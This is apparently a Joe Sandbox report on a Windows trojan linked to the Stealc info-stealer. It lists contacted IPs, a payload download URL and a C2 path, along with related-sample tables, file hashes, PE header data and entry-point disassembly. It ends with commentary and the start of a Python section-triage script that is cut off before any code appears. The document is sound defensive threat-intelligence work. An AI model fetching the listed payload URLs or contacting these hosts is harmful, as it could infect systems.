https://post-to-me.com/ | ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://upx.sf.net | Amcache.hve.7.dr | false | (none) | high
http://92.255.57.89/A | 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000985000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://176.113.115.19/ScreenUpdateSync.exe | ssB9bjDQPf.exe, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.179.207 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
92.255.57.89 | unknown | Russian Federation | 42253 | TELSPRU | true
176.113.115.19 | unknown | Russian Federation | 49505 | SELECTELRU | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572687
Start date and time: 2024-12-10 18:57:38 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ssB9bjDQPf.exe (renamed because the original name is a hash value)
Original Sample Name: 26ceb3d9dcc1821192b39eea6832d51d.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@4/7@1/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 50
• Number of non-executed functions: 345
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.12.23.50, 20.190.177.20
• Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ssB9bjDQPf.exe

Time | Type | Description
12:58:41 | API Interceptor | 9189858x Sleep call for process: ssB9bjDQPf.exe modified
12:59:14 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Context by IP

Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.179.207 | 6X4BIzTTBR.exe | malicious | Stealc |
172.67.179.207 | IeccNv7PP6.exe | malicious | Stealc, Vidar |
172.67.179.207 | XOr3Kqyo9n.exe | malicious | Stealc |
172.67.179.207 | 0r9PL33C8E.exe | malicious | Stealc |
172.67.179.207 | Pw2KHOL9Z8.exe | malicious | Stealc |
172.67.179.207 | o3QbCA4xLs.exe | malicious | Stealc, Vidar |
172.67.179.207 | XhYAqi0wi5.exe | malicious | Stealc |
172.67.179.207 | Uviv7rEtnt.exe | malicious | Stealc, Vidar |
172.67.179.207 | GK059kPZ5B.exe | malicious | Stealc |
172.67.179.207 | w12rykWq2L.exe | malicious | Stealc |
92.255.57.89 | ief722WreR.exe | malicious | Stealc | 92.255.57.89/45c616e921a794b8.php
92.255.57.89 | yZB8qfUJJu.exe | malicious | Stealc | 92.255.57.89/45c616e921a794b8.php
92.255.57.89 | 5gR5rEGCfw.exe | malicious | Stealc, Vidar | 92.255.57.89/45c616e921a794b8.php
92.255.57.89 | 7gxaFDUSOD.exe | malicious | Stealc | 92.255.57.89/45c616e921a794b8.php
176.113.115.19 | ief722WreR.exe | malicious | Stealc | 176.113.115.19/ScreenUpdateSync.exe
176.113.115.19 | 7gxaFDUSOD.exe | malicious | Stealc | 176.113.115.19/ScreenUpdateSync.exe

Context by domain

Match | Associated Sample Name / URL | Detection | Threat Name | Context
post-to-me.com | ief722WreR.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | 7gxaFDUSOD.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | YQ3PhY2Aeq.exe | malicious | Stealc, Vidar | 104.21.56.70
post-to-me.com | 6X4BIzTTBR.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | vwkb5DQRAL.exe | malicious | Stealc, Vidar | 104.21.56.70
post-to-me.com | IeccNv7PP6.exe | malicious | Stealc, Vidar | 172.67.179.207
post-to-me.com | XOr3Kqyo9n.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | 0r9PL33C8E.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | Pw2KHOL9Z8.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | Tg3sk2wywR.exe | malicious | Stealc | 104.21.56.70

Context by ASN

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | JNKHlxGvw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.16.1
CLOUDFLARENETUS | http://enteolcl.top/ | malicious | Unknown | 104.21.112.1
CLOUDFLARENETUS | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 104.21.64.208
CLOUDFLARENETUS | 751ietQPnX.lnk | malicious | RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | l92fYljXWF.lnk | malicious | RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | qxjDerXRGR.lnk | malicious | RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | taCCGTk8n1.lnk | malicious | RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | CMK7DB5YtR.exe | malicious | LummaC Stealer | 104.21.64.1
CLOUDFLARENETUS | XrQ8NgQHTn.exe | malicious | LummaC Stealer | 104.21.64.1
TELSPRU | ief722WreR.exe | malicious | Stealc | 92.255.57.89
TELSPRU | yZB8qfUJJu.exe | malicious | Stealc | 92.255.57.89
TELSPRU | 5gR5rEGCfw.exe | malicious | Stealc, Vidar | 92.255.57.89
TELSPRU | 7gxaFDUSOD.exe | malicious | Stealc | 92.255.57.89
TELSPRU | https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9 | malicious | Unknown | 92.255.57.144
TELSPRU | https://reviewgustereports.com/ | malicious | CAPTCHA Scam ClickFix, XWorm | 92.255.57.155
TELSPRU | S1NrYNOYhZ.exe | malicious | Stealc, Vidar | 92.255.57.88
TELSPRU | S4h5LcSjJc.exe | malicious | Stealc | 92.255.57.88
TELSPRU | 8z6iZ5YzKB.exe | malicious | Stealc | 92.255.57.88
TELSPRU | sXWh51zcTv.exe | malicious | Stealc | 92.255.57.88
SELECTELRU | ief722WreR.exe | malicious | Stealc | 176.113.115.19
SELECTELRU | 5gR5rEGCfw.exe | malicious | Stealc, Vidar | 176.113.115.215
SELECTELRU | 7gxaFDUSOD.exe | malicious | Stealc | 176.113.115.19
SELECTELRU | la.bot.arm7.elf | malicious | Mirai | 45.89.231.211
SELECTELRU | 5EZLEXDveC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 176.113.115.163
SELECTELRU | teste.sh4.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 45.138.214.123
SELECTELRU | xd.sh4.elf | malicious | Mirai | 176.124.33.0
SELECTELRU | YQ3PhY2Aeq.exe | malicious | Stealc, Vidar | 176.113.115.37
SELECTELRU | 442.docx.exe | malicious | RMSRemoteAdmin | 109.234.156.179
SELECTELRU | 442.docx.exe | malicious | RMSRemoteAdmin | 109.234.156.179

Context by fingerprint

Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | ief722WreR.exe | malicious | Stealc | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe | malicious | GuLoader | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | Bank Swift and SOA PRN0072700314159453_pdf.exe | malicious | GuLoader, MassLogger RAT | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | ST07933.exe | malicious | GuLoader, Snake Keylogger | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | 7gxaFDUSOD.exe | malicious | Stealc | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | PO-8776-2024.js | malicious | Remcos | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | FPqVs6et5F.exe | malicious | Unknown | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | c2.hta | malicious | XWorm | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | document.pif.exe | malicious | GuLoader, Snake Keylogger | 172.67.179.207
37f463bf4616ecd445d4a1937da06e19 | lFxGd66yDa.exe | malicious | NetSupport RAT | 172.67.179.207
                                                  No context
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.964913320555941
                                                  Encrypted:false
                                                  SSDEEP:192:DBajRj/0WHlFjucZrP2izuiFDZ24IO8U:DQjsWHlFjNFzuiFDY4IO8U
                                                  MD5:45D73F4AE335D6C49FA7411EDD67F546
                                                  SHA1:6B727C5008C24460131A956B054F649DECFF5C80
                                                  SHA-256:1997E812962AE5DF2F7ADA2925EEB002F3F9D7A6720F00029CF14B515EBCF744
                                                  SHA-512:57A4CFD26AF4351CA4DFB8837AC3ADDEE3AC62ED200D553EB3861F87E866F0924DC346BDE25A58F228DEDAD603D6ED002E80E1E8ED655FF9AE486F5ED3AE0889
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.7.1.4.2.9.4.9.6.7.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.7.1.4.3.5.2.7.8.0.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.e.1.0.e.f.5.-.7.4.3.5.-.4.a.2.6.-.b.4.3.2.-.5.b.c.1.d.2.6.1.d.3.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.e.9.e.0.f.4.-.c.8.7.8.-.4.8.4.0.-.9.e.b.4.-.c.a.c.6.d.f.b.7.a.b.c.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.D.F.0...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.0.0.-.0.0.0.1.-.0.0.1.4.-.b.5.9.2.-.8.2.2.7.2.d.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.6.e.c.4.4.b.4.c.5.b.1.6.0.5.9.7.6.d.b.3.9.3.e.4.e.5.9.c.f.d.d.0.0.0.0.1.5.0.6.!.0.0.0.0.9.a.5.7.c.0.a.e.8.6.4.0.c.a.e.d.5.1.0.1.3.7.2.1.4.7.b.7.3.c.8.7.d.e.a.4.b.2.d.a.!.8.D.F.0...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 17:59:03 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):107118
                                                  Entropy (8bit):1.6843245047812372
                                                  Encrypted:false
                                                  SSDEEP:384:DSEUp1nBAUiIE2CAox+QSn41B9iCw8Sao4Se5V9j0U49mch:DVmBriIEv+bS9iCSWtRch
                                                  MD5:8E1091D62796A050D4FE7034F34BADB6
                                                  SHA1:B71879B93DF62E6227428460613F6510D4A95898
                                                  SHA-256:AB6D9B3DA9CB47AA18D5A8DFCDA186BB917641DA7A9CD2758AC184DE4637C139
                                                  SHA-512:5AF6A9DEF437D7E61BFFAB2C8566B953F59E5031041789F4EB5610205CEC529BBFA32D0BCDBDF60EBB145B56B837FDBECB40198AB732C403933C404B5A403C5D
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... .......g.Xg.........................................B..........T.......8...........T............3..no..........D...........0 ..............................................................................eJ....... ......GenuineIntel............T...........T.Xg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8322
                                                  Entropy (8bit):3.6953867355424013
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJXp6HMCO5qOe6Yq36jGgmfl7pDp89b9WsfQ/m:R6lXJ56Hvuqn6Yy6Cgmflo91fV
                                                  MD5:2AA22F50ACFBC0895F8B18EB33D31609
                                                  SHA1:B3C6946026D9D33DD82A51E42E97D192B9FEB39A
                                                  SHA-256:00DD9F05C68D77002FF9BBCB29AECA1B0B4A5DE693866BD34B4C39D0A9193316
                                                  SHA-512:5E9E5599BBEFE01989395B859F847019423E57D9713F9B0ADE8A19F1659F7618331B286F6FC2E17BD6F6B814AF2C920085C3EC0CBC2B08B39D6DD6A6157D3AC8
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.8.0.<./.P.i.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4575
                                                  Entropy (8bit):4.445403138854711
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsQiJg77aI9IbWpW8VYvYm8M4JBeFU+q8uMHJxzhfd:uIjfQwI7yq7V/JpqHzhfd
                                                  MD5:3C24856C4FBA43124968C2DD0C2708B7
                                                  SHA1:30CC262EA4125F2C1807E3123FE4324825A8A8B2
                                                  SHA-256:DF33D644525A89F46938D6DD385E95310D069900E91704DC9AD6FBD7A853E2E8
                                                  SHA-512:9DA8CE70A2BC0F5095ED840D35F9D0C414410608AB1CD06B8E3A400D64712BC1A3A20D7A8867AEFDFE354574FAFE93B3EAF79FCEE97370A96BFD992C9C84652B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625501" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):304640
                                                  Entropy (8bit):6.2361529050834195
                                                  Encrypted:false
                                                  SSDEEP:6144:N6peExujyYGuewLbCDGwCpBlkvbZvxRC8hw:vpGue+SGDqvbZvxA8
                                                  MD5:5DE218396F8C0A36CEE31B8EE4FD0BFE
                                                  SHA1:9A57C0AE8640CAED5101372147B73C87DEA4B2DA
                                                  SHA-256:84B4EDA5D456A2C49D117A0B99BC2ED03044EAA144EB5F6C28A248E673E406DB
                                                  SHA-512:82F557E91F94A2EC8DEE5B32E21B07BCE01425EA72FA02DED984E5CDD98019C6028444F3CB10332661A1E8BD3A90EDCD566B602CAC03B94CCD1F276E4C59553F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L....mCf.....................$?...................@.......................... B......N......................................D...<.....@.."..............................................................................`............................text............................... ..`.rdata..\ ......."..................@..@.data....=..0...l..................@....rsrc...."....@..$..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):304640
                                                  Entropy (8bit):6.2361529050834195
                                                  Encrypted:false
                                                  SSDEEP:6144:N6peExujyYGuewLbCDGwCpBlkvbZvxRC8hw:vpGue+SGDqvbZvxA8
                                                  MD5:5DE218396F8C0A36CEE31B8EE4FD0BFE
                                                  SHA1:9A57C0AE8640CAED5101372147B73C87DEA4B2DA
                                                  SHA-256:84B4EDA5D456A2C49D117A0B99BC2ED03044EAA144EB5F6C28A248E673E406DB
                                                  SHA-512:82F557E91F94A2EC8DEE5B32E21B07BCE01425EA72FA02DED984E5CDD98019C6028444F3CB10332661A1E8BD3A90EDCD566B602CAC03B94CCD1F276E4C59553F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L....mCf.....................$?...................@.......................... B......N......................................D...<.....@.."..............................................................................`............................text............................... ..`.rdata..\ ......."..................@..@.data....=..0...l..................@....rsrc...."....@..$..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.372053185616116
                                                  Encrypted:false
                                                  SSDEEP:6144:KFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:iV1QyWWI/glMM6kF7+q
                                                  MD5:23EB1B9005CF39A0109813491986654B
                                                  SHA1:AB13D6B59C0803D8CF9231C2A4093BA4909A3445
                                                  SHA-256:653B929EBB789790A6A5E7836563700173C1F67741104D08E4D1863FFE52DE50
                                                  SHA-512:A9877B8940490FF226D887453310DE6C553F1D3995C978DB4D6DF0155319129E00F88D3ED7EAC4D72AC5916180D1FB641B0017A38C4EF9CEF25EB5E4CE72DAD1
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:.b2-K................................................................................................................................................................................................................................................................................................................................................u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):6.9640815832629865
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.55%
                                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:ssB9bjDQPf.exe
                                                  File size:430'592 bytes
                                                  MD5:26ceb3d9dcc1821192b39eea6832d51d
                                                  SHA1:d22dae62f3d122acaec58a03550d5d99a9b7cfb4
                                                  SHA256:fe7c9c900df7c51f53243053dcf41ee781d284206742952aea704735d8d4a198
                                                  SHA512:2dd773c7afa7cb46c1f94d195e9b542a5e8ec150b608d8dcde0aa60f7aff15ea0fced33fe647519cca91ada905dce14576a8b2b84bc0c9ecfc6f362a3cdccda8
                                                  SSDEEP:12288:+kmdgMiHbQuCIu+Sp+tXcyZpCxFzR7DB5:zmAHq+Sp+RbpCrF7V
                                                  TLSH:6F94CE1175F48439EFF68B714BB0C2A41A7BBC626B34918E7A953A5F19332E08E71703
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L...Z..d...
                                                  Icon Hash:46c7c30b0f4e8d19
                                                  Entrypoint:0x4014f7
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x64B7CC5A [Wed Jul 19 11:43:22 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:d3b3bde725d7f4017897955975268d5d
                                                  Instruction
                                                  call 00007F9804B31240h
                                                  jmp 00007F9804B2E73Dh
                                                  mov edi, edi
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 00000328h
                                                  mov dword ptr [00454878h], eax
                                                  mov dword ptr [00454874h], ecx
                                                  mov dword ptr [00454870h], edx
                                                  mov dword ptr [0045486Ch], ebx
                                                  mov dword ptr [00454868h], esi
                                                  mov dword ptr [00454864h], edi
                                                  mov word ptr [00454890h], ss
                                                  mov word ptr [00454884h], cs
                                                  mov word ptr [00454860h], ds
                                                  mov word ptr [0045485Ch], es
                                                  mov word ptr [00454858h], fs
                                                  mov word ptr [00454854h], gs
                                                  pushfd
                                                  pop dword ptr [00454888h]
                                                  mov eax, dword ptr [ebp+00h]
                                                  mov dword ptr [0045487Ch], eax
                                                  mov eax, dword ptr [ebp+04h]
                                                  mov dword ptr [00454880h], eax
                                                  lea eax, dword ptr [ebp+08h]
                                                  mov dword ptr [0045488Ch], eax
                                                  mov eax, dword ptr [ebp-00000320h]
                                                  mov dword ptr [004547C8h], 00010001h
                                                  mov eax, dword ptr [00454880h]
                                                  mov dword ptr [0045477Ch], eax
                                                  mov dword ptr [00454770h], C0000409h
                                                  mov dword ptr [00454774h], 00000001h
                                                  mov eax, dword ptr [00452004h]
                                                  mov dword ptr [ebp-00000328h], eax
                                                  mov eax, dword ptr [00452008h]
                                                  mov dword ptr [ebp-00000324h], eax
                                                  call dword ptr [000000B4h]
                                                  Programming Language:
                                                  • [C++] VS2008 build 21022
                                                  • [ASM] VS2008 build 21022
                                                  • [ C ] VS2008 build 21022
                                                  • [IMP] VS2005 build 50727
                                                  • [RES] VS2008 build 21022
                                                  • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x50844 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x42e000 | 0x12210 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x50508 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4f000 | 0x160 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4db1c | 0x4dc00 | 4ed51016bf626d0128c45006d30110f6 | False | 0.8527400271302251 | data | 7.554689479421369 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4f000 | 0x205c | 0x2200 | fd2173179414cfe0c1a1fc5fef8d0219 | False | 0.36121323529411764 | data | 5.415478136885594 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x52000 | 0x3db0d8 | 0x6c00 | 703a7fd3a4a0188e14acaac8089ab34e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x42e000 | 0x12210 | 0x12400 | ebfb4a524e7a64507198814607ca0913 | False | 0.515451091609589 | data | 5.465733474606782 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
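Two numbers in the section table above are the ones a triager reads first: .text has an entropy of 7.55 (close to the 8.0 of compressed or encrypted bytes), and .data maps 0x3db0d8 bytes of memory from only 0x6c00 bytes on disk, which is the usual shape of a stub that unpacks its real code into a pre-reserved writable region at runtime. The script below is an added example, not part of the Joe Sandbox report: it parses a PE32 section table from raw bytes and applies those same checks (Shannon entropy, VirtualSize/SizeOfRawData ratio, writable-plus-executable flags). Because the sample's bytes are not on the page, it builds a constructed PE image whose section sizes and flags mirror the report's table but whose contents are synthetic.

```python
"""Section-table triage for a PE32 image: entropy, VirtualSize/RawSize ratio, W+X.
Added example, not from the Joe Sandbox report. The image is constructed here to mirror
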